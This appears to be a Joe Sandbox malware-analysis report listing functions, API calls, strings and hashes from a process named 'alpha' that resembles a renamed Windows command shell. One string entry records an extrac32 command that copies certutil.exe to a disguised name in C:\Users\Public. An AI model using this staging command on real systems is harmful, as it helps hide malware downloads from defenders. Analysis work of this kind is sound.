                                                                                                          • Instruction ID: 1e0e18a68fccf9bab832f832951af8581289d0aa3bce1b256795ffe6f20ac40e
                                                                                                          • Opcode Fuzzy Hash: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                                                                                                          • Instruction Fuzzy Hash: 6D91C7A2A1A64285EB12AB1CF4501B9EBA0FF84B98FD64135D65E436F4EF3CE545C320
                                                                                                          APIs
                                                                                                          • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7AB147251), ref: 00007FF7AB14628E
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ObjectSingleWait
                                                                                                          • String ID: wil
                                                                                                          • API String ID: 24740636-1589926490
                                                                                                          • Opcode ID: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                                                                                                          • Instruction ID: 28b9f0211b5458fd69f2e1548c03fdcc8f74352d93a95d18ed4f389fa1ff351e
                                                                                                          • Opcode Fuzzy Hash: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                                                                                                          • Instruction Fuzzy Hash: 7A4173B1A0958283F3216B1DF440279B6A1EF8578CFD29271D50E46AB8EF3DE945C721
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: FormatMessage$ByteCharFreeLocalMultiWide_ultoa
                                                                                                          • String ID: $Application$System
                                                                                                          • API String ID: 3377411628-1881496484
                                                                                                          • Opcode ID: 80d38d575318b3867918aa38a6e3db8ef172391286b4c5249a392e05da5dfb20
                                                                                                          • Instruction ID: cf090b0cfd5d17015db820ae1e56e3bc1c588ea57aecd8f301820d5f024d68b6
                                                                                                          • Opcode Fuzzy Hash: 80d38d575318b3867918aa38a6e3db8ef172391286b4c5249a392e05da5dfb20
                                                                                                          • Instruction Fuzzy Hash: 51416772B05A029AE711AB68F4403EDBBA5FB8974CF854235DA4E03B68EF3CD145C750
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: AttributesDirectoryFileRemove$ErrorFullLastNamePath
                                                                                                          • String ID: :$\
                                                                                                          • API String ID: 3961617410-1166558509
                                                                                                          • Opcode ID: 7382dc9ba5dd15d1d826e80cca2a433ebb6210e0cfd6d3e104106e7a41e883e1
                                                                                                          • Instruction ID: 8d7a2713207fc6a61b3dd56f0b257a47f964dcf6fc4c11d195f6d3e0289f80e5
                                                                                                          • Opcode Fuzzy Hash: 7382dc9ba5dd15d1d826e80cca2a433ebb6210e0cfd6d3e104106e7a41e883e1
                                                                                                          • Instruction Fuzzy Hash: 6B21B722A09642C6E752AB6CF484079FAA1FF4B758FC64675D91F433B0DF3CD4498620
                                                                                                          APIs
                                                                                                          Similarity
                                                                                                          • API ID: CreateDirectoryDriveFullNamePathTypememset
                                                                                                          • String ID:
                                                                                                          • API String ID: 1397130798-0
                                                                                                          • Opcode ID: 8e7edb5b5352e80bd08ad7f08d899ebe22464f4bcaa288bcf446cfe77ebb0b3e
                                                                                                          • Instruction ID: 86c3cc8716986ae30a45ecfe4c023472c163ea386f6927b29e602ef4bb094d46
                                                                                                          • Opcode Fuzzy Hash: 8e7edb5b5352e80bd08ad7f08d899ebe22464f4bcaa288bcf446cfe77ebb0b3e
                                                                                                          • Instruction Fuzzy Hash: F5919A6261AB82C6EB6AAB15F4402BEF3E5FB44B48F868135D94D07774EF3CD9448720
                                                                                                          APIs
                                                                                                            • Part of subcall function 00007FF7AB1306C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7AB12B4DB), ref: 00007FF7AB1306D6
                                                                                                            • Part of subcall function 00007FF7AB1306C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7AB12B4DB), ref: 00007FF7AB1306F0
                                                                                                            • Part of subcall function 00007FF7AB1306C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7AB12B4DB), ref: 00007FF7AB13074D
                                                                                                            • Part of subcall function 00007FF7AB1306C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7AB12B4DB), ref: 00007FF7AB130762
                                                                                                          • _wcsicmp.MSVCRT ref: 00007FF7AB1325CA
                                                                                                          • _wcsicmp.MSVCRT ref: 00007FF7AB1325E8
                                                                                                          • _wcsicmp.MSVCRT ref: 00007FF7AB13260F
                                                                                                          • _wcsicmp.MSVCRT ref: 00007FF7AB132636
                                                                                                          • _wcsicmp.MSVCRT ref: 00007FF7AB132650
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: _wcsicmp$Heap$AllocProcess
                                                                                                          • String ID: CMDEXTVERSION$DEFINED$ERRORLEVEL$EXIST$NOT
                                                                                                          • API String ID: 3407644289-1668778490
                                                                                                          • Opcode ID: 73bc52d87adb43f98016766748090f79ae3978062519f174c0f235f90d2ce4d7
                                                                                                          • Instruction ID: 83b5298d83ff9a82ac00fe04b9a354e98d7b85cdbf8394d14ba224b988a85f13
                                                                                                          • Opcode Fuzzy Hash: 73bc52d87adb43f98016766748090f79ae3978062519f174c0f235f90d2ce4d7
                                                                                                          • Instruction Fuzzy Hash: 3031A261A0A60281FB9B7F2DF850279E694BF44B48FC68030D95E462B5EE3CE448C771
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: memset$callocfreememmovewcschr$AttributesErrorFileLastqsorttowupperwcsrchr
                                                                                                          • String ID: &()[]{}^=;!%'+,`~
                                                                                                          • API String ID: 2516562204-381716982
                                                                                                          • Opcode ID: 46497fca5754c6479966f60d4708fe0825c75a770e24346d8a6fbe1751f9d7e4
                                                                                                          • Instruction ID: 1e49a89f63fa1b8cda2586f9bf55592d36cd6bfa91fd6d7765f206885af8926b
                                                                                                          • Opcode Fuzzy Hash: 46497fca5754c6479966f60d4708fe0825c75a770e24346d8a6fbe1751f9d7e4
                                                                                                          • Instruction Fuzzy Hash: 83C1C232A0665186E755AF69E8842BEB7A0FB44B98F851235DE4E43BB4DF3CE450C710
                                                                                                          APIs
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7AB12D46E
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7AB12D485
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: wcschr.MSVCRT ref: 00007FF7AB12D4EE
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: iswspace.MSVCRT ref: 00007FF7AB12D54D
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: wcschr.MSVCRT ref: 00007FF7AB12D569
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: wcschr.MSVCRT ref: 00007FF7AB12D58C
                                                                                                          • iswspace.MSVCRT ref: 00007FF7AB137EEE
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: wcschr$Heapiswspace$AllocProcess
                                                                                                          • String ID: A
                                                                                                          • API String ID: 3731854180-3554254475
                                                                                                          • Opcode ID: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
                                                                                                          • Instruction ID: ac8c1a80ef16caf79848e0006009c95e95ea6c464e9b0e533becd4a6cadcd607
                                                                                                          • Opcode Fuzzy Hash: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
                                                                                                          • Instruction Fuzzy Hash: 45A1CD7190A682C6E662BB1AF450679F6A0FF4979CF828134CA4D477B5EF3CE4458B20
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: MemoryProcessRead$AddressLibraryLoadProc
                                                                                                          • String ID: NTDLL.DLL$NtQueryInformationProcess
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseCreateFileHandle_open_osfhandle_wcsicmp
                                                                                                          • String ID: con
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: Heap$File$Process$AllocCloseCreateFreeHandlePointerRead
                                                                                                          • String ID: PE
                                                                                                          APIs
                                                                                                          • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF7AB14849D,?,?,?,00007FF7AB14F0C7), ref: 00007FF7AB130045
                                                                                                          • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF7AB14F0C7,?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7AB14E964), ref: 00007FF7AB130071
                                                                                                          • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7AB130092
                                                                                                          • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7AB1300A7
                                                                                                          • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7AB130148
                                                                                                          • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF7AB130181
                                                                                                          Similarity
                                                                                                          • API ID: File$LockPointerShared$AcquireByteCharMultiReadReleaseWide
                                                                                                          • String ID:
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: Enum$Openwcsrchr
                                                                                                          • String ID: %s=%s$.$\Shell\Open\Command
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: memset$wcscmp
                                                                                                          • String ID: %s
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: memset$EnvironmentVariable
                                                                                                          • String ID: DIRCMD
                                                                                                          APIs
                                                                                                            • Part of subcall function 00007FF7AB12CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7AB12B9A1,?,?,?,?,00007FF7AB12D81A), ref: 00007FF7AB12CDA6
                                                                                                            • Part of subcall function 00007FF7AB12CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7AB12B9A1,?,?,?,?,00007FF7AB12D81A), ref: 00007FF7AB12CDBD
                                                                                                          • wcschr.MSVCRT(?,?,?,00007FF7AB1299DD), ref: 00007FF7AB129A39
                                                                                                            • Part of subcall function 00007FF7AB12DF60: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,00000000,00007FF7AB12CEAA), ref: 00007FF7AB12DFB8
                                                                                                            • Part of subcall function 00007FF7AB12DF60: RtlFreeHeap.NTDLL ref: 00007FF7AB12DFCC
                                                                                                            • Part of subcall function 00007FF7AB12DF60: _setjmp.MSVCRT ref: 00007FF7AB12E03E
                                                                                                          • wcschr.MSVCRT(?,?,?,00007FF7AB1299DD), ref: 00007FF7AB129AF0
                                                                                                          • wcschr.MSVCRT(?,?,?,00007FF7AB1299DD), ref: 00007FF7AB129B0F
                                                                                                            • Part of subcall function 00007FF7AB1296E8: memset.MSVCRT ref: 00007FF7AB1297B2
                                                                                                            • Part of subcall function 00007FF7AB1296E8: ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7AB129880
                                                                                                          • _wcsupr.MSVCRT ref: 00007FF7AB13B844
                                                                                                          • wcscmp.MSVCRT ref: 00007FF7AB13B86D
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: Heap$wcschr$Process$AllocFree_setjmp_wcsuprmemsetwcscmp
                                                                                                          • String ID: FOR$ IF
                                                                                                          APIs
                                                                                                          • iswdigit.MSVCRT(?,?,00000000,00007FF7AB131F69,?,?,?,?,?,?,?,00007FF7AB12286E,00000000,00000000,00000000,00000000), ref: 00007FF7AB12F0D6
                                                                                                          • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF7AB12E626,?,?,00000000,00007FF7AB131F69), ref: 00007FF7AB12F1BA
                                                                                                          • wcschr.MSVCRT(?,?,00000000,00007FF7AB131F69,?,?,?,?,?,?,?,00007FF7AB12286E,00000000,00000000,00000000,00000000), ref: 00007FF7AB12F1E7
                                                                                                          • iswdigit.MSVCRT(00000000,00000000,?,00000000,?,00007FF7AB12E626,?,?,00000000,00007FF7AB131F69), ref: 00007FF7AB12F1FF
                                                                                                          • iswdigit.MSVCRT(?,?,00000000,00007FF7AB131F69,?,?,?,?,?,?,?,00007FF7AB12286E,00000000,00000000,00000000,00000000), ref: 00007FF7AB12F2BB
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: iswdigit$iswspacewcschr
                                                                                                          • String ID: )$=,;
                                                                                                          • API String ID: 1959970872-2167043656
                                                                                                          • Opcode ID: 4f4e76ffb3d3d3f1682d86852f25dc45ca8acbfdb86516db9a39298bef1f035d
                                                                                                          • Instruction ID: 1340c4b57e46a9866988841a0addfefc2c8743069ec8e830ff6237f1b8346d76
                                                                                                          • Opcode Fuzzy Hash: 4f4e76ffb3d3d3f1682d86852f25dc45ca8acbfdb86516db9a39298bef1f035d
                                                                                                          • Instruction Fuzzy Hash: 2C41CB61E0A256C2FBA6AB1DF554379F7A0BF00748FC65131CA8D022B4DF3CA4858FA1
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast$InformationVolumeiswalphatowupper
                                                                                                          • String ID: %04X-%04X$:
                                                                                                          • API String ID: 930873262-1938371929
                                                                                                          • Opcode ID: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
                                                                                                          • Instruction ID: 09d73a8e328b1ccd2c49a69ae4b3651d15b63a49c98d56976a09b00e8b8eacc4
                                                                                                          • Opcode Fuzzy Hash: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
                                                                                                          • Instruction Fuzzy Hash: 60419371A09A42C2E766AB58F4802BAF260FB84708FD24235DA4E436F4EF7DD545C730
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: FileWrite$ByteCharMultiWide$_get_osfhandle
                                                                                                          • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                                                                                                          • API String ID: 3249344982-2616576482
                                                                                                          • Opcode ID: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                                                                                                          • Instruction ID: 9ce6d27886b5732f21aeeb94806a773f6d6cc504f55cbaa339fdb555aa24f152
                                                                                                          • Opcode Fuzzy Hash: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                                                                                                          • Instruction Fuzzy Hash: B2418172619B4186E3519F1AF844369FAA0FB49BD8F865234DA4E077B4DF3CD118CB14
                                                                                                          APIs
                                                                                                          • iswdigit.MSVCRT(?,?,00000000,00007FF7AB1368A3,?,?,?,?,?,?,?,00000000,?,00007FF7AB1363F3), ref: 00007FF7AB136A73
                                                                                                          • wcschr.MSVCRT(?,?,00000000,00007FF7AB1368A3,?,?,?,?,?,?,?,00000000,?,00007FF7AB1363F3), ref: 00007FF7AB136A91
                                                                                                          • wcschr.MSVCRT(?,?,00000000,00007FF7AB1368A3,?,?,?,?,?,?,?,00000000,?,00007FF7AB1363F3), ref: 00007FF7AB136AB0
                                                                                                          • wcschr.MSVCRT(?,?,00000000,00007FF7AB1368A3,?,?,?,?,?,?,?,00000000,?,00007FF7AB1363F3), ref: 00007FF7AB136AE3
                                                                                                          • wcschr.MSVCRT(?,?,00000000,00007FF7AB1368A3,?,?,?,?,?,?,?,00000000,?,00007FF7AB1363F3), ref: 00007FF7AB136B01
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: wcschr$iswdigit
                                                                                                          • String ID: +-~!$<>+-*/%()|^&=,
                                                                                                          • API String ID: 2770779731-632268628
                                                                                                          • Opcode ID: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
                                                                                                          • Instruction ID: af658a5a865841c193d56c64d21eb98e2b08d32aa8ffff380edee551e11cd2e2
                                                                                                          • Opcode Fuzzy Hash: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
                                                                                                          • Instruction Fuzzy Hash: 9931012260AA55C5EA956F49F4902B9B6E0FB45F89BC68135DA4E43378EF3CD404C720
                                                                                                          APIs
                                                                                                          Similarity
                                                                                                          • API ID: File_get_osfhandle$Pointer$BuffersFlushRead
                                                                                                          • String ID:
                                                                                                          • API String ID: 3192234081-0
                                                                                                          • Opcode ID: 21cbebea3a03736acc453a065156524b21459c684ab1bf839b7458faa090dfc7
                                                                                                          • Instruction ID: e42002e07e2c976ac2adc2f8436ff871d0dd7acc5bd2466ef677c6df6784d418
                                                                                                          • Opcode Fuzzy Hash: 21cbebea3a03736acc453a065156524b21459c684ab1bf839b7458faa090dfc7
                                                                                                          • Instruction Fuzzy Hash: 9E31A031609642CBEB11AF29F44467DFBA1FB89B98F869634DE4A437B5DE3CD4018B10
                                                                                                          APIs
                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,00000000,?,00007FF7AB1314D6,?,?,?,00007FF7AB12AA22,?,?,?,00007FF7AB12847E), ref: 00007FF7AB131673
                                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7AB1314D6,?,?,?,00007FF7AB12AA22,?,?,?,00007FF7AB12847E), ref: 00007FF7AB13168D
                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7AB1314D6,?,?,?,00007FF7AB12AA22,?,?,?,00007FF7AB12847E), ref: 00007FF7AB131757
                                                                                                          • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7AB1314D6,?,?,?,00007FF7AB12AA22,?,?,?,00007FF7AB12847E), ref: 00007FF7AB13176E
                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7AB1314D6,?,?,?,00007FF7AB12AA22,?,?,?,00007FF7AB12847E), ref: 00007FF7AB131788
                                                                                                          • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7AB1314D6,?,?,?,00007FF7AB12AA22,?,?,?,00007FF7AB12847E), ref: 00007FF7AB13179C
                                                                                                          Similarity
                                                                                                          • API ID: Heap$Process$Alloc$Size
                                                                                                          • String ID:
                                                                                                          • API String ID: 3586862581-0
                                                                                                          • Opcode ID: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
                                                                                                          • Instruction ID: 80d74a0a64668750726a2dd08d3dc44c1f82c4165d7146f4c2f2910f92d78735
                                                                                                          • Opcode Fuzzy Hash: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
                                                                                                          • Instruction Fuzzy Hash: D7918631A0A65681EA5AAF1DF450278F6A0FF45B98F9A8535CE4D033B4EF3CE459D320
                                                                                                          APIs
                                                                                                          Similarity
                                                                                                          • API ID: ConsoleErrorOpenTitleTokenwcsstr$CloseFormatFreeLastLocalMessageProcessStatusThread
                                                                                                          • String ID:
                                                                                                          • API String ID: 1313749407-0
                                                                                                          • Opcode ID: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
                                                                                                          • Instruction ID: 965d488defb5d1503709e516f1251146df68317991192c5b34181d36da9d11c4
                                                                                                          • Opcode Fuzzy Hash: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
                                                                                                          • Instruction Fuzzy Hash: 5351D725A0A68282EA967B1DF414179EA91FF45B98F9A4230CD1E073F4FF3CE4498320
                                                                                                          APIs
                                                                                                          Similarity
                                                                                                          • API ID: Error$CurrentDirectoryModememset$EnvironmentLastVariable
                                                                                                          • String ID:
                                                                                                          • API String ID: 920682188-0
                                                                                                          • Opcode ID: e085c0e934932d338285153c9ea3decf014a211b58656fc54525e3f8b2b0a2cc
                                                                                                          • Instruction ID: 17bb0b00f705dddfd2d5aa31b7b8a3ee18918520d21ef14f7f49effffd43b9ca
                                                                                                          • Opcode Fuzzy Hash: e085c0e934932d338285153c9ea3decf014a211b58656fc54525e3f8b2b0a2cc
                                                                                                          • Instruction Fuzzy Hash: 40516D32706B818AEB26EF28E8546E8B7A0FB89B48F458135CA4E47774EF3CD545C710
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          • extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe , xrefs: 00007FF7AB12E00B
                                                                                                          Similarity
                                                                                                          • API ID: Heap$FreeProcess_setjmp
                                                                                                          • String ID: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                                                          • API String ID: 777023205-3344945345
                                                                                                          • Opcode ID: bbf52200d93ced3108c92f56beefed0410d329e72fd007d8cbedcbd411aea915
                                                                                                          • Instruction ID: 20e25a36aa0330a817a098103257f9ce846bef6cd475565b34434753ee6cfc54
                                                                                                          • Opcode Fuzzy Hash: bbf52200d93ced3108c92f56beefed0410d329e72fd007d8cbedcbd411aea915
                                                                                                          • Instruction Fuzzy Hash: 4A516731A0FA46C6EB16AF1DF890578F6A4FF48B5CFD64536D90E422B4EF3CA4418621
                                                                                                          APIs
                                                                                                          • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF7AB12E626,?,?,00000000,00007FF7AB131F69), ref: 00007FF7AB12F1BA
                                                                                                          • wcschr.MSVCRT(?,?,00000000,00007FF7AB131F69,?,?,?,?,?,?,?,00007FF7AB12286E,00000000,00000000,00000000,00000000), ref: 00007FF7AB12F1E7
                                                                                                          • iswdigit.MSVCRT(00000000,00000000,?,00000000,?,00007FF7AB12E626,?,?,00000000,00007FF7AB131F69), ref: 00007FF7AB12F1FF
                                                                                                          • iswdigit.MSVCRT(?,?,00000000,00007FF7AB131F69,?,?,?,?,?,?,?,00007FF7AB12286E,00000000,00000000,00000000,00000000), ref: 00007FF7AB12F2BB
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          Similarity
                                                                                                          • API ID: iswdigit$iswspacewcschr
                                                                                                          • String ID: )$=,;
                                                                                                          • API String ID: 1959970872-2167043656
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          Similarity
                                                                                                          • API ID: _wcsnicmpfprintfwcsrchr
                                                                                                          • String ID: CMD Internal Error %s$%s$Null environment
                                                                                                          • API String ID: 3625580822-2781220306
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          Similarity
                                                                                                          • API ID: memsetwcsspn
                                                                                                          • String ID:
                                                                                                          • API String ID: 3809306610-0
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          Similarity
                                                                                                          • API ID: wcschr$iswdigit$wcstol
                                                                                                          • String ID:
                                                                                                          • API String ID: 3841054028-0
                                                                                                          APIs
                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF7AB143687
                                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF7AB12260D), ref: 00007FF7AB1436A6
                                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF7AB12260D), ref: 00007FF7AB1436EB
                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF7AB143703
                                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF7AB12260D), ref: 00007FF7AB143722
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          Similarity
                                                                                                          • API ID: Console$Write_get_osfhandle$Mode
                                                                                                          • String ID:
                                                                                                          • API String ID: 1066134489-0
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          Similarity
                                                                                                          • API ID: memset$DriveErrorInformationLastTypeVolume
                                                                                                          • String ID:
                                                                                                          • API String ID: 850181435-0
                                                                                                          APIs
                                                                                                            • Part of subcall function 00007FF7AB133578: _get_osfhandle.MSVCRT ref: 00007FF7AB133584
                                                                                                            • Part of subcall function 00007FF7AB133578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7AB1232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7AB13359C
                                                                                                            • Part of subcall function 00007FF7AB133578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7AB1232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7AB1335C3
                                                                                                            • Part of subcall function 00007FF7AB133578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7AB1232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7AB1335D9
                                                                                                            • Part of subcall function 00007FF7AB133578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7AB1232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7AB1335ED
                                                                                                            • Part of subcall function 00007FF7AB133578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7AB1232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7AB133602
                                                                                                          • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF7AB133491,?,?,?,00007FF7AB144420), ref: 00007FF7AB133514
                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF7AB133522
                                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,00000000,00007FF7AB133491,?,?,?,00007FF7AB144420), ref: 00007FF7AB133541
                                                                                                          • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF7AB133491,?,?,?,00007FF7AB144420), ref: 00007FF7AB13355E
                                                                                                            • Part of subcall function 00007FF7AB1336EC: _get_osfhandle.MSVCRT ref: 00007FF7AB133715
                                                                                                            • Part of subcall function 00007FF7AB1336EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF7AB133770
                                                                                                            • Part of subcall function 00007FF7AB1336EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7AB133791
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          Similarity
                                                                                                          • API ID: LockShared$_get_osfhandle$AcquireConsoleFileReleaseWrite$ByteCharHandleModeMultiTypeWide
